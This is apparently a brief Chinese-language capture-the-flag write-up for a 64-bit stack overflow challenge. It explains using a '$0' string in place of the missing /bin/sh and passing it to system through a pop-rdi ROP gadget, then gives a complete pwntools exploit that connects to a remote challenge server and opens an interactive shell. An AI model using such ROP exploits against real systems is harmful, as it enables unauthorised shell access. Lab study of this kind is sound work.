找不到/bin/sh
字符串,存在$0
這裏因爲64位程序與32位不同是通過寄存器傳參的
思路,通過read函數溢出棧空間0x10大小,構造ROP鏈,調用system,通過rdi給system傳參
exp
from pwn import *
p = remote('114.116.54.89' ,10004)
rop = 0x4007d3
_system = 0x400570
bin_sh = 0x60111f
p.recvuntil('Come on,try to pwn me')
payload = b'9' * (0x10 + 8) + p64(rop) + p64(bin_sh) + p64(_system)
p.sendline(payload)
p.interactive()